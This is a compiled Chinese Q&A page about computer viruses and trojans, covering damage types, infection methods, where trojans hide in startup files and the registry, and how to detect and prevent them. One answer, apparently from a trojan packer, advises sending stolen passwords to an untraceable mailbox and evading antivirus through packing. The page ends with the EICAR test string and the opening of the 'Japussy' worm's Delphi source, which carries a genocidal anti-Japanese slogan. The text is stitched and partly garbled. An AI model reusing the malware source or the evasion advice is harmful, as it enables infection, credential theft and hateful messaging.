八 他的破壞行為計算機病毒的破壞行為體現了病毒的殺傷能力。病毒破壞行為的激烈程度取決於病毒作者的主觀願望和他所具有的技術能量。數以萬計不斷發展擴張的病毒，其破壞行為千奇百怪，不可能窮舉其破壞行為，而且難以做全面的描述，根據現有的病毒資料可以把病毒的破壞目標和攻擊部位歸納如下：

攻擊系統數據區，攻擊部位包括：硬碟主引尋扇區、Boot扇區、FAT表、文件目錄等。一般來說，攻擊系統數據區的病毒是惡性病毒，受損的數據不易恢復。 攻擊文件病毒對文件的攻擊方式很多，可列舉如下：刪除、改名、替換內容、丟失部分程序代碼、內容顛倒、寫入時間空白、變碎片、假冒文件、丟失文件簇、丟失數據文件等。 攻擊內存內存是計算機的重要資源，也是病毒攻擊的主要目標之一，病毒額外地佔用和消耗系統的內存資源，可以導致一些較的大程序難以運行。病毒攻擊內存的方式如下：佔用大量內存、改變內存總量、禁止分配內存、蠶食內存等。 干擾系統運行病毒會干擾系統的正常運行，以此做為自己的破壞行為，此類行為也是花樣繁多，可以列舉下述諸方式：不執行命令、干擾內部命令的執行、虛假報警、使文件打不開、使內部棧溢出、佔用特殊數據區、時鍾倒轉、重啟動、死機、強制游戲、擾亂串列口、並行口等。 速度下降病毒激活時，其內部的時間延遲程序啟動，在時鍾中納入了時間的循環計數，迫使計算機空轉，計算機速度明顯下降。 攻擊磁碟攻擊磁碟數據、不寫盤、寫操作變讀操作、寫盤時丟位元組等。 擾亂屏幕顯示病毒擾亂屏幕顯示的方式很多，可列舉如下：字元跌落、環繞、倒置、顯示前一屏、游標下跌、滾屏、抖動、亂寫、吃字元等。 鍵盤病毒干擾鍵盤操作，已發現有下述方式：響鈴、封鎖鍵盤、換字、抹掉緩存區字元、重復、輸入紊亂等。 喇叭許多病毒運行時，會使計算機的喇叭發出響聲。有的病毒作者通過喇叭發出種種聲音，有的病毒作者讓病毒演奏旋律優美的世界名曲，在高雅的曲調中去殺戮人們的信息財富，已發現的喇叭發聲有以下方式：演奏曲子、警笛聲、炸彈雜訊、鳴叫、咔咔聲、嘀嗒聲等。 攻擊CMOS 在機器的CMOS區中，保存著系統的重要數據，例如系統時鍾、磁碟類型、內存容量等，並具有校驗和。有的病毒激活時，能夠對CMOS區進行寫入動作，破壞系統CMOS中的數據。 干擾列印機典型現象為：假報警、間斷性列印、更換字元等。

九、計算機病毒的危害性計算機資源的損失和破壞，不但會造成資源和財富的巨大浪費，而且有可能造成社會性的災難，隨著信息化社會的發展，計算機病毒的威脅日益嚴重，反病毒的任務也更加艱巨了。1988年11月2日下午5時1分59秒，美國康奈爾大學的計算機科學系研究生，23歲的莫里斯（Morris）將其編寫的蠕蟲程序輸入計算機網路，致使這個擁有數萬台計算機的網路被堵塞。這件事就像是計算機界的一次大地震，引起了巨大反響，震驚全世界，引起了人們對計算機病毒的恐慌，也使更多的計算機專家重視和致力於計算機病毒研究。1988年下半年，我國在統計局系統首次發現了「小球」病毒，它對統計系統影響極大，此後由計算機病毒發作而引起的「病毒事件」接連不斷，前一段時間發現的CIH、美麗殺等病毒更是給社會造成了很大損失。

3.計算機病毒是一個程序，一段可執行碼。就像生物病毒一樣，計算機病毒有獨特的復制能力。計算機病毒可以很快地蔓延，又常常難以根除。它們能把自身附著在各種類型的文件上。當文件被復制或從一個用戶傳送到另一個用戶時，它們就隨同文件一起蔓延開來。

除復制能力外，某些計算機病毒還有其它一些共同特性：一個被污染的程序能夠傳送病毒載體。當你看到病毒載體似乎僅僅表現在文字和圖象上時，它們可能也已毀壞了文件、再格式化了你的硬碟驅動或引發了其它類型的災害。若是病毒並不寄生於一個污染程序，它仍然能通過占據存貯空間給你帶來麻煩，並降低你的計算機的全部性能。

可以從不同角度給出計算機病毒的定義。一種定義是通過磁碟、磁帶和網路等作為媒介傳播擴散,能「傳染」 其他程序的程序。另一種是能夠實現自身復制且藉助一定的載體存在的具有潛伏性、傳染性和破壞性的程序。還有的定義是一種人為製造的程序,它通過不同的途徑潛伏或寄生在存儲媒體（如磁碟、內存）或程序里。當某種條件或時機成熟時,它會自生復制並傳播,使計算機的資源受到不同程序的破壞等等。這些說法在某種意義上借用了生物學病毒的概念,計算機病毒同生物病毒所相似之處是能夠侵入計算機系統和網路,危害正常工作的「病原體」。它能夠對計算機系統進行各種破壞,同時能夠自我復制, 具有傳染性。所以, 計算機病毒就是能夠通過某種途徑潛伏在計算機存儲介質（或程序）里, 當達到某種條件時即被激活的具有對計算機資源進行破壞作用的一組程序或指令集合。

計算機病毒寄生方式有哪幾種?

（1）寄生在磁碟引導扇區中：任何操作系統都有個自舉過程, 例如DOS在啟動時, 首先由系統讀入引導扇區記錄並執行它, 將DOS讀入內存。病毒程序就是利用了這一點, 自身占據了引導扇區而將原來的引導扇區內容及其病毒的其他部分放到磁碟的其他空間, 並給這些扇區標志為壞簇。這樣, 系統的一次初始化, 病毒就被激活了。它首先將自身拷貝到內存的高端並占據該范圍, 然後置觸發條件如INT 13H中斷（磁碟讀寫中斷）向量的修改, 置內部時鍾的某一值為條件等, 最後引入正常的操作系統。以後一旦觸發條件成熟, 如一個磁碟讀或寫的請求, 病毒就被觸發。如果磁碟沒有被感染（通過識別標志）則進行傳染。

（2）寄生在可執行程序中：這種病毒寄生在正常的可執行程序中, 一旦程序執行病毒就被激活, 於是病毒程序首先被執行, 它將自身常駐內存, 然後置觸發條件, 也可能立即進行傳染, 但一般不作表現。做完這些工作後, 開始執行正常的程序, 病毒程序也可能在執行正常程序之後再置觸發條件等工作。病毒可以寄生在源程序的首部也可以寄生在尾部, 但都要修改源程序的長度和一些控制信息, 以保證病毒成為源程序的一部分, 並在執行時首先執行它。這種病毒傳染性比較強。

（3）寄生在硬碟的主引導扇區中：例如大麻病毒感染硬碟的主引導扇區, 該扇區與DOS無關。

計算機病毒的工作過程應包括哪些環節?

計算機病毒的完整工作過程應包括以下幾個環節：

（1）傳染源：病毒總是依附於某些存儲介質, 例如軟盤、 硬碟等構成傳染源。

（2）傳染媒介：病毒傳染的媒介由工作的環境來定, 可能是計算機網, 也可能是可移動的存儲介質, 例如軟磁碟等。

（3）病毒激活：是指將病毒裝入內存, 並設置觸發條件, 一旦觸發條件成熟, 病毒就開始作用－－自我復制到傳染對象中, 進行各種破壞活動等。

（4）病毒觸發：計算機病毒一旦被激活, 立刻就發生作用, 觸發的條件是多樣化的, 可以是內部時鍾, 系統的日期, 用戶標識符，也可能是系統一次通信等等。

（5）病毒表現：表現是病毒的主要目的之一, 有時在屏幕顯示出來, 有時則表現為破壞系統數據。可以這樣說, 凡是軟體技術能夠觸發到的地方, 都在其表現范圍內。

（6）傳染：病毒的傳染是病毒性能的一個重要標志。在傳染環節中, 病毒復制一個自身副本到傳染對象中去。

不同種類的計算機病毒的傳染方法有何不同?

從病毒的傳染方式上來講, 所有病毒到目前為止可以歸結於三類：感染用戶程序的計算機病毒；感染操作系統文件的計算機病毒；感染磁碟引導扇區的計算機病毒。這三類病毒的傳染方式均不相同。

感染用戶應用程序的計算機病毒的傳染方式是病毒以鏈接的方式對應用程序進行傳染。這種病毒在一個受傳染的應用程序執行時獲得控制權, 同時掃描計算機系統在硬碟或軟盤上的另外的應用程序, 若發現這些程序時, 就鏈接在應用程序中, 完成傳染, 返回正常的應用程序並繼續執行。

感染操作系統文件的計算機病毒的傳染方式是通過與操作系統中所有的模塊或程序鏈接來進行傳染。由於操作系統的某些程序是在系統啟動過程中調入內存的, 所以傳染操作系統的病毒是通過鏈接某個操作系統中的程序或模塊並隨著它們的運行進入內存的。病毒進入內存後就判斷是否滿足條件時則進行傳?/ca>

⑷ 如何給自己的電腦植入病毒啊

以我8個月的黑客軟體加殼程序員的經驗告訴你，一般情況下確實可以。
07年前常見的灰鴿子、僵屍等遠控病毒，都可以在被激活的情況下自動工作，而且會將捕獲的數據傳送給指定的郵箱，提示下：保證安全前提下，這個郵箱應該和你沒有唯一指向性。記住一點：黑客的電腦永遠要是最安全的。
當然你不上線是無法指定木馬對數據進行分類捕捉，木馬只能按照之前設定的序列去工作，比如捕獲常見的賬號密碼之類的，對於時事的畫面是無力的。
只要你的病毒不被查殺，正常運行就能發揮作用，除非你的脫殼加華工作做得不到位。原理上分析，只要加入自己的特徵碼就能順利逃過殺毒軟體，畢竟殺毒是滯後性的。

⑸ 計算機病毒和木馬的工作原理和過程（好的追加200）

「木馬」程序是目前比較流行的病毒文件，與一般的病毒不同，它不會自我繁殖，也並不「刻意」地去感染其他文件，它通過將自身偽裝吸引用戶下載執行，向施種木馬者提供打開被種者電腦的門戶，使施種者可以任意毀壞、竊取被種者的文件，甚至遠程操控被種者的電腦。「木馬」與計算機網路中常常要用到的遠程式控制制軟體有些相似，但由於遠程式控制制軟體是「善意」的控制，因此通常不具有隱蔽性；「木馬」則完全相反，木馬要達到的是「偷竊」性的遠程式控制制，如果沒有很強的隱蔽性的話，那就是「毫無價值」的。

一個完整的「木馬」程序包含了兩部分：「伺服器」和「控制器」。植入被種者電腦的是「伺服器」部分，而所謂的「黑客」正是利用「控制器」進入運行了「伺服器」的電腦。運行了木馬程序的「伺服器」以後，被種者的電腦就會有一個或幾個埠被打開，使黑客可以利用這些打開的埠進入電腦系統，安全和個人隱私也就全無保障了！
病毒是附著於程序或文件中的一段計算機代碼，它可在計算機之間傳播。它一邊傳播一邊感染計算機。病毒可損壞軟體、硬體和文件。

病毒 (n.)：以自我復制為明確目的編寫的代碼。病毒附著於宿主程序，然後試圖在計算機之間傳播。它可能損壞硬體、軟體和信息。

與人體病毒按嚴重性分類（從 Ebola 病毒到普通的流感病毒）一樣，計算機病毒也有輕重之分，輕者僅產生一些干擾，重者徹底摧毀設備。令人欣慰的是，在沒有人員操作的情況下，真正的病毒不會傳播。必須通過某個人共享文件和發送電子郵件來將它一起移動。

「木馬」全稱是「特洛伊木馬(TrojanHorse)」，原指古希臘士兵藏在木馬內進入敵方城市從而佔領敵方城市的故事。在Internet上，「特洛伊木馬」指一些程序設計人員(或居心不良的馬夫)在其可從網路上下載(Download)的應用程序或游戲外掛、或網頁中，包含了可以控制用戶的計算機系統或通過郵件盜取用戶信息的惡意程序，可能造成用戶的系統被破壞、信息丟失甚至令系統癱瘓。

一、木馬的特性

特洛伊木馬屬於客戶/服務模式。它分為兩大部分，既客戶端和服務端。其原理是一台主機提供服務(伺服器端)，另一台主機接受服務(客戶端)，作為伺服器的主機一般會打開一個默認的埠進行監聽。如果有客戶機向伺服器的這一埠提出連接請求，伺服器上的相應程序就會自動運行，來答應客戶機的請求。這個程序被稱為進程。

木馬一般以尋找後門、竊取密碼為主。統計表明，現在木馬在病毒中所佔的比例已經超過了四分之一，而在近年湧起的病毒潮中，木馬類病毒占絕對優勢，並將在未來的若干年內愈演愈烈。木馬是一類特殊的病毒，如果不小心把它當成一個軟體來使用，該木馬就會被「種」到電腦上，以後上網時，電腦控制權就完全交給了「黑客」，他便能通過跟蹤擊鍵輸入等方式，竊取密碼、信用卡號碼等機密資料，而且還可以對電腦進行跟蹤監視、控制、查看、修改資料等操作。

二、木馬發作特性

在使用計算機的過程中如果您發現:計算機反應速度發生了明顯變化，硬碟在不停地讀寫,滑鼠不聽使喚,鍵盤無效,自己的一些窗口在被關閉，新的窗口被莫名其妙地打開，網路傳輸指示燈一直在閃爍，沒有運行大的程序，而系統卻越來越慢，系統資源站用很多，或運行了某個程序沒有反映(此類程序一般不大，從十幾k到幾百k都有)或在關閉某個程序時防火牆探測到有郵件發出……這些不正常現象表明:您的計算機中了木馬病毒。

三、木馬的工作原理以及手動查殺介紹

由於大多玩家對安全問題了解不多，所以並不知道自己的計算機中了「木馬」該怎麼樣清除。因此最關鍵的還是要知道「木馬」的工作原理，這樣就會很容易發現「木馬」。相信你看了這篇文章之後，就會成為一名查殺「木馬」的高手了。(如果成不了高手建議大家用皮筋打斑竹家玻璃，嘿嘿)

「木馬」程序會想盡一切辦法隱藏自己，主要途徑有：在任務欄中隱藏自己，這是最基本的只要把Form的Visible屬性設為False。ShowInTaskBar設為False，程序運行時就不會出現在任務欄中了。在任務管理器中隱形：將程序設為「系統服務」可以很輕松地偽裝自己。

A、啟動組類(就是機器啟動時運行的文件組)

當然木馬也會悄無聲息地啟動，你當然不會指望用戶每次啟動後點擊「木馬」圖標來運行服務端，(沒有人會這么傻吧？？)。「木馬」會在每次用戶啟動時自動裝載服務端，Windows系統啟動時自動載入應用程序的方法，「木馬」都會用上，如：啟動組、win.ini、system.ini、注冊表等等都是「木馬」藏身的好地方。通過win.ini和system.ini來載入木馬。在Windows系統中，win.ini和system.ini這兩個系統配置文件都存放在C:windows目錄下，你可以直接用記事本打開。可以通過修改win.ini文件中windows節的「load=file.exe，run=file.exe」語句來達到木馬自動載入的目的。此外在system.ini中的boot節，正常的情況下是「Shell=Explorer.exe」(Windows系統的圖形界面命令解釋器)。下面具體談談「木馬」是怎樣自動載入的。

1、在win.ini文件中，在[WINDOWS]下面，「run=」和「load=」是可能載入「木馬」程序的途徑，必須仔細留心它們。一般情況下，它們的等號後面什麼都沒有，如果發現後面跟有路徑與文件名不是你熟悉的啟動文件，你的計算機就可能中上「木馬」了。當然你也得看清楚，因為好多「木馬」，如「AOLTrojan木馬」，它把自身偽裝成command.exe文件，如果不注意可能不會發現它不是真正的系統啟動文件。

通過c:windowswininit.ini文件。很多木馬程序在這里做一些小動作，這種方法往往是在文件的安裝過程中被使用，程序安裝完成之後文件就立即執行，與此同時安裝的原文件被Windows刪除干凈，因此隱蔽性非常強，例如在wininit.ini中如果Rename節有如下內容:NUL=c:windowspicture.exe，該語句將c:windowspicture.exe發往NUL,這就意味著原來的文件pictrue.exe已經被刪除，因此它運行起來就格外隱蔽。

2、在system.ini文件中，在[BOOT]下面有個「shell=文件名」。正確的文件名應該是「explorer.exe」，如果不是「explorer.exe」，而是「shell=explorer.exe程序名」，那麼後面跟著的那個程序就是「木馬」程序，就是說你已經中「木馬」了。

win.ini、system.ini文件可以通過「開始」菜單里的「運行」來查看。只要在「運行」對話框中輸入「msconfig」,後點擊「確定」按鈕就行了。(這里大家一定要注意，如果你對計算機不是很了解，請不要輸入此命令或刪除里邊的文件，否則一切後果和損失自己負責。斑竹和本人不承擔任何責任。)

3、對於下面所列的文件也要勤加檢查，木馬們也可能隱藏在

C：\windows\winstart.bat和C:\windows\winnint.ini，還有Autoexec.bat

B、注冊表(注冊表就是注冊表，懂電腦的人一看就知道了)

1、從菜單中載入。如果自動載入的文件是直接通過在Windows菜單上自定義添加的，一般都會放在主菜單的「開始->程序->啟動」處，在Win98資源管理器里的位置是「C:windowsstartmenuprograms啟動」處。通過這種方式使文件自動載入時，一般都會將其存放在注冊表中下述4個位置上：

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellFolders

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserS!hellFolders

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\explorer\UserShellFolders

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\explorer\ShellFolders

2、在注冊表中的情況最復雜，在點擊至：「HKEY-LOCAL-MACHINE\Software\Microsoft\Windows\CurrentVersion\Run」目錄下，查看鍵值中有沒有自己不熟悉的自動啟動文件，擴展名為EXE，這里切記：有的「木馬」程序生成的文件很像系統自身文件，想通過偽裝矇混過關，如「AcidBatteryv1.0木馬」，它將注冊表「HKEY-LOCAL-MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run」下的Explorer鍵值改為Explorer=「C:\WINDOWS\expiorer.exe」，「木馬」程序與真正的Explorer之間只有「i」與「l」的差別。當然在注冊表中還有很多地方都可以隱藏「木馬」程序，如：「HKEY-CURRENT-USER\Software\Microsoft\Windows\CurrentVersion\Run」、「HKEY-USERS\＊＊＊＊\Software\Microsoft\Windows\CurrentVersion\Run」的目錄下都有可能，最好的辦法就是在「HKEY-LOCAL-MACHINE\Software\Microsoft\Windows\CurrentVersion\Run」下找到「木馬」程序的文件名，再在整個注冊表中搜索即可。

3、此外在注冊表中的HKEY_CLASSES_ROOT\exefile\shell\open\command=

「1」「*」處，如果其中的「1」被修改為木馬，那麼每次啟動一個該可執行文件時木馬就會啟動一次，例如著名的冰河木馬就是將TXT文件的Notepad.exe改成!了它自己的啟動文件，每次打開記事本時就會自動啟動冰河木馬，做得非常隱蔽。

注冊表可以通過在「運行」對話框中輸入「regedit」來查看。需要說明的是，對系統注冊表進行刪除修改操作前一定要將注冊表備份，因為對注冊表操作有一定的危險性，加上木馬的隱藏較隱蔽，可能會有一些誤操作，如果發現錯誤，可以將備份的注冊表文件導入到系統中進行恢復。(次命令同樣很危險，如不懂計算機請不要嘗試。切記)

C、埠(埠，其實就是網路數據通過操作系統進入計算機的入口)

1、萬變不離其宗，木馬啟動都有一個方式，它只是在一個特定的情況下啟動。所以平常多注意你的埠。一般的木馬默認埠有

BO31337，YAL1999，Deep2140，Throat3150，冰河7636，Sub71243

那麼如何查看本機開放哪些埠呢？

在dos里輸入以下命令：netstat-an,就能看到自己的埠了，一般網路常用埠有：21,23,25,53,80,110,139，如果你的埠還有其他的，你可要注意了，因為現在有許多木馬可以自己設定埠。(上面這些木馬的埠是以前的，由於時間和安全的關系現在好多新木馬的埠我不知道，也不敢去試，因為技術更新的太快了，我跟不上了。55555555555555)

2、由於木馬的運行常通過網路的連接來實現的，因此如果發現可疑的網路連接就可以推測木馬的存在，最簡單的辦法是利用Windows自帶的Netstat命令來查看。一般情況下，如果沒有進行任何上網操作，在MS-DOS窗口中用Netstat命令將看不到什麼信息，此時可以使用「netstat-a」,「-a」選項用以顯示計算機中目前所有處於監聽狀態的埠。如果出現不明埠處於監聽狀態，而目前又沒有進行任何網路服務的操作，那麼在監聽該埠的很可能是木馬。

3、系統進程：

在Win2000/XP中按下「CTL+ALT+DEL」，進入任務管理器，就可看到系統正在運行的全部進程，一一清查即可發現木馬的活動進程。

在Win98下，查找進程的方法不那麼方便，但有一些查找進程的工具可供使用。通過查看系統進程這種方法來檢測木馬非常簡便易行，但是對系統必須熟悉，因為Windows系統在運行時本身就有一些我們不是很熟悉的進程在運行著，因此這個時候一定要小心操作，木馬還是可以通過這種方法被檢測出來的。

四、軟體查殺木馬介紹

上面所介紹的都是以手工方式來檢測或者清除木馬，但一般情況下木馬沒有那麼容易就能發現，木馬是很會隱藏的哦。幸好在已經有了不少的反木馬軟體。下面介紹幾款軟體，

1、瑞星殺毒軟體。

2、個人版天網防火牆。根據反彈式木馬的原理，就算你中了別人的木馬，但由於防火牆把你的計算機和外界隔開，木馬的客戶端也連接不上你。防火牆啟動之後，一旦有可疑的網路連接或者木馬對電腦進行控制，防火牆就會報警，同時顯示出對方的IP地址、接入埠等提示信息，通過手工設置之後即可使對方無法進行攻擊。不過對於一些個別機器來說，運行天網會影響機器的運行速度。

3、木馬剋星。目前具我所知，是只查殺木馬的軟體，也是能查殺木馬種類最多的軟體。顧名思義，木馬剋星不克乾坤無敵槌也不克北冥槌法，專克各種木馬。但也不是絕對哦，好象「灰鴿子」能屏蔽掉木馬剋星。(聽說而已沒試過哦。「灰鴿子」也是一種木馬，和冰河差不多。)(現在木馬剋星大多是沒注冊的版本。用木馬剋星查木馬時，要是提示你發現木馬只有注冊用戶才能清除，這只是作者的一個小手段，其實他的意思是如果發現木馬，那麼只有注冊用戶才能清楚，要是真的發現了木馬，軟體會告訴你木馬的具體位置和名字是什麼。我們用其他的軟體和手段清除不就行了)

4。綠鷹PC萬能精靈。他會實時監控你的計算機，看著「系統安全」心理舒服多了。

有了類似的這些防護軟體，你的計算機基本上是安全了。但道高一尺，魔高一丈。最近又出現了一種可以把木馬偽裝易容的程序(不知道是哪個高手搞的，很是厲害)，就是把木馬本體根據排列組合生成多個木馬，而殺毒軟體只能查殺他們的母體。而後生成的木馬就不能查到了，所以手動人工的清除木馬我們還是要掌握一些地。

軟體查殺其他病毒很有效，對木馬的檢查也是蠻成功地，但徹底地清除不很理想，因為一般情況下木馬在電腦每次啟動時都會自動載入，而殺病毒軟體卻不能完全清除木馬文件，總的說來，殺病毒軟體作為防止木馬的入侵來說更有效。

五、木馬的防禦

隨著網路的普及和網路游戲裝備可以換人民幣的浪潮，木馬的傳播越來越快，而且新的變種層出不窮，我們在檢測清除它的同時，更要注意採取措施來預防它，下面列舉幾種預防木馬的方法。(大家的意見，我借用而已)

1、不要下載、接收、執行任何來歷不明的軟體或文件

很多木馬病毒都是通過綁定在其他的軟體或文件中來實現傳播的，一旦運行了這個被綁定的軟體或文件就會被感染，因此在下載的時候需要特別注意，一般推薦去一些信譽比較高的站點。在軟體安裝之前一定要用反病毒軟體檢查一下，建議用專門查殺木馬的軟體來進行檢查，確定無毒和無馬後再使用。

2、不要隨意打開郵件的附件，也不要點擊郵件中的可疑圖片。(後邊另外介紹一個關於郵件的例子，大家注意收看。)

3、將資源管理器配置成始終顯示擴展名。將Windows資源管理器配置成始終顯示擴展名，一些文件擴展名為vbs、shs、pif的文件多為木馬病毒的特徵文件，如果碰到這些可疑的文件擴展名時就應該引起注意。

4、盡量少用共享文件夾。如果因工作等原因必須將電腦設置成共享，則最好單獨開一個共享文!件夾，把所有需共享的文件都放在這個共享文件夾中，注意千萬不要將系統目錄設置成共享。

5、運行反木馬實時監控程序。木馬防範重要的一點就是在上網時最好運行反木馬實時監控程序，PC萬用精靈等軟體一般都能實時顯示當前所有運行程序並有詳細的描述信息。此外如加上一些專業的最新殺毒軟體、個人防火牆等進行監控基本就可以放心了。

6、經常升級系統。很多木馬都是通過系統漏洞來進行攻擊的，微軟公司發現這些漏洞之後都會在第一時間內發布補丁，很多時候打過補丁之後的系統本身就是一種最好的木馬防範辦法。

六、木馬傳播的個別範例(給大家介紹一個郵件類的)

1、來自網路的攻擊手段越來越多了，一些帶木馬的惡意網頁會利用軟體或系統操作平台等的安全漏洞，通過執行嵌入在網頁HTML超文本標記語言內的JavaApplet小應用程序、javascript腳本語言程序、ActiveX軟體部件交互技術支持可自動執行的代碼程序，強行修改用戶操作系統的注冊表及系統實用配置程序，從而達到非法控制系統資源、破壞數據、格式化硬碟、感染木馬程序、盜取用戶數據資料等目的。

目前來自網頁的攻擊分為兩種：一種是通過編輯的腳本程序修改IE瀏覽器；另外一種是直接破壞Windows系統。前者一般會修改IE瀏覽器的標題欄、默認主頁或直接將木馬「種」在你的機器里等等；後者是直接鎖定你的鍵盤、滑鼠等輸入設備然後對系統進行破壞。

(作者插言)：還好目前盜取千年用戶名和密碼的「木馬」功能還僅僅是偷盜行為，沒有發展成破壞行為。要不然號被盜了，在順便把硬碟被格式化了。那樣想第一時間找回密碼就都沒可能。希望這種情況不要發生。(啊門我彌佗佛)

下邊是正題了，大家看仔細了！

假如您收到的郵件附件中有一個看起來是這樣的文件(或者貌似這類文件，總之是特別誘人的文件，而且格式還很安全。)：QQ靚號放送.txt，您是不是認為它肯定是純文本文件？我要告訴您，不一定！它的實際文件名可以是QQ靚號放送.txt.{3050F4D8-98B5-11CF-BB82-00AA00BDCE0B}。

{3050F4D8-98B5-11CF-BB82-00AA00BDCE0B}在注冊表裡是HTML文件關聯的意思。但是存成文件名的時候它並不會顯現出來，您看到的就是個.txt文件，這個文件實際上等同於QQ靚號放送.txt.html。那麼直接打開這個文件為什麼有危險呢？請看如果這個文件的內容如下：

您可能以為它會調用記事本來運行，可是如果您雙擊它，結果它卻調用了HTML來運行，並且自動在後台開始通過網頁載入木馬文件。同時顯示「正在打開文件」之類的這樣一個對話框來欺騙您。您看隨意打開附件中的.txt的危險夠大了吧？

欺騙實現原理：當您雙擊這個偽裝起來的.txt時候，由於真正文件擴展名是.{3050F4D8-98B5-11CF-BB82-00AA00BDCE0B}，也就是.html文件，於是就會以html文件的形式運行，這是它能運行起來的先決條件。

在某些惡意網頁木馬中還會調用「WScript」。

WScript全稱WindowsScriptingHost，它是Win98新加進的功能,是一種批次語言/自動執行工具——它所對應的程序「WScript.exe」是一個腳本語言解釋器，位於c:\WINDOWS下，正是它使得腳本可以被執行，就象執行批處理一樣。在WindowsScriptingHost腳本環境里，預定義了一些對象，通過它自帶的幾個內置對象，可以實現獲取環境變數、創建快捷方式、載入程序、讀寫注冊表等功能。

最近聽不少玩家反映，許多馬夫通過冒充千年官方網站的辦法給玩家發名字類似「您的千年密碼確認函」、「您的千年資料保護建議」等的郵件，來騙取玩家的信任，來點擊運行該木馬郵件。希望廣大玩家在點擊這類郵件時一定要看清郵件是否來自於千年官方網站。如是來自其他什麼網站或個人郵箱的，馬上刪除，記得一定要馬上刪除，別抱任何僥幸心理。

七、關於「木馬」的防禦(純屬個人意見，不付法律責任)

防止木馬對在家上網來說是很簡單的事，無非就是裝一大堆殺毒軟體，並及時升級。(再新的木馬只要傳播速度快的話很快就會成為各種殺毒軟體的戰利品，除非此人專門定做個人木馬)在加上天網防火牆(很多黑客就是利用口令和漏洞進行遠程式控制制，該防火牆可以防止口令和漏洞入侵)基本上就可以解決問題啦，除非是自己好奇或是不小心打開了木馬服務端，我想這種情況還是佔一定的比例！

但是對網吧上網的來說，再好的防禦也是白撤。

據我所知，現在的網吧安全系數幾乎等於00000000，現在最厲害的應該就是裝個還「原精靈吧」，但是......我個人認為那東西用處不是很大，說是保護用戶密碼還不如說它是網吧保護系統的一種軟體。現在的木馬一般都是通過郵件方式傳送密碼的，也就是說，你只要在輸入框內輸入你的密碼之後，木馬控制方就已經得到你的ID和密碼了(一般不會超過三分鍾)！對網吧上網的朋友來說，靠復制方法輸入ID和密碼算最安全的了，很多木馬程序實際上就是一個鍵盤記錄工具，在你不知情的情況下把你的鍵盤輸入情況全部記錄了下來，然後通過網路發送出去！(好可怕哦，不過具我所知現在公安部和文化部已經明令禁止網吧安裝還原精靈了，說是為了保留歷史記錄雲雲。唉~~就這么點防禦手段也給封殺了，哭哦)

總之，家庭上網用戶記得隨時更新自己的病毒庫，隨時檢查計算機進程，發現不明進程馬上格殺，不瀏覽一些不明站點(我通常是靠域名來分析站點的可靠程度，一般一級域名都不會出現惡意代碼和網頁木馬)，更別隨意接收別人給你發送的文件和郵件！

網吧防盜真的很困難了，什麼人都有，復雜了，就算老闆花錢去注冊一個木馬剋星，呵呵。。。都沒用，想做壞事的人同樣能把他幹掉~~~~我個人認為，網吧上網除了復制ID密碼粘貼到輸入框，其他的就得聽天由命了~~~~~

八、關於大家都用的醉翁巷1.1G的說明

用了人家的軟體，就總要替人家說句公道話。前些時候，有人說醉翁1.1G軟體運行後，沒什麼反映。當關閉軟體的一剎那，一些防護類軟體提示：此軟體正在監視本機鍵盤！！

其實就是醉翁巷中的hook.dll文件在作怪。下面給大家說說「勾子」的我問題。

什麼是勾子

在Windows系統中，勾子(hook)是一種特殊的消息處理機制。勾子可以監視系統或進程中的各種事件消息，截獲發往目標窗口的消息並進行處理。這樣，我們就可以在系統中安裝自定義的勾子，監視系統中特定事件的發生，完成特定的功能，比如截獲鍵盤、滑鼠的輸入，屏幕取詞，日誌監視等等。可見，利用勾子可以實現許多特殊而有用的功能。因此，對於高級編程人員來說，掌握勾子的編程方法是很有必要的。

勾子的類型

按使用范圍分類，主要有線程勾子和系統勾子

(1)線程勾子監視指定線程的事件消息。

(2)系統勾子監視系統中的所有線程的事件消息。因為系統勾子會影響系統中所有的應用程序，所以勾子函數必須放在獨立的動態鏈接庫(DLL)中。這是系統勾子和線程勾子很大的不同之處。

醉翁巷中的hook.dll就是完成以上功能的程序，由於勾子對程序的特殊性，所以會有部分軟體報告發現他在記錄鍵盤動作，不過不會報告說他是木馬。(呵呵搞的確實挺嚇人的。不過就算它記錄鍵盤動作，只要不發送就沒太大危險了)

九、大總結(就是對上邊的大總結啦)

大家知道了「木馬」的工作原理，查殺「木馬」就變得很容易，如果發現有「木馬」存在，最安全也是最有效的方法就是馬上將計算機與網路斷開，防止黑客通過網路對你進行攻擊。然後在根據實際情況進行處理。

⑹ 電腦病毒代碼

不行的 得用虛擬機才可以測試病毒代碼 無需下載，把下面這段代碼復制到記事本里，保存為文本文件
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

熊貓燒香
ogram Japussy;
uses
Windows, SysUtils, Classes, Graphics, ShellAPI{, Registry};
const
HeaderSize = 82432; //病毒體的大小
IconOffset = $12EB8; //PE文件主圖標的偏移量

//在我的Delphi5 SP1上面編譯得到的大小，其它版本的Delphi可能不同
//查找2800000020的十六進制字元串可以找到主圖標的偏移量

{
HeaderSize = 38912; //Upx壓縮過病毒體的大小
IconOffset = $92BC; //Upx壓縮過PE文件主圖標的偏移量

//Upx 1.24W 用法: upx -9 --8086 Japussy.exe
}
IconSize = $2E8; //PE文件主圖標的大小--744位元組
IconTail = IconOffset + IconSize; //PE文件主圖標的尾部
ID = $44444444; //感染標記

//垃圾碼，以備寫入
Catchword = 'If a race need to be killed out, it must be Yamato. ' +
'If a country need to be destroyed, it must be Japan! ' +
'*** W32.Japussy.Worm.A ***';
{$R *.RES}
function RegisterServiceProcess(dwProcessID, dwType: Integer): Integer;
stdcall; external 'Kernel32.dll'; //函數聲明
var
TmpFile: string;
Si: STARTUPINFO;
Pi: PROCESS_INFORMATION;
IsJap: Boolean = False; //日文操作系統標記
{ 判斷是否為Win9x }
function IsWin9x: Boolean;
var
Ver: TOSVersionInfo;
begin
Result := False;
Ver.dwOSVersionInfoSize := SizeOf(TOSVersionInfo);
if not GetVersionEx(Ver) then
Exit;
if (Ver.dwPlatformID = VER_PLATFORM_WIN32_WINDOWS) then //Win9x
Result := True;
end;
{ 在流之間復制 }
procere CopyStream(Src: TStream; sStartPos: Integer; Dst: TStream;
dStartPos: Integer; Count: Integer);
var
sCurPos, dCurPos: Integer;
begin
sCurPos := Src.Position;
dCurPos := Dst.Position;
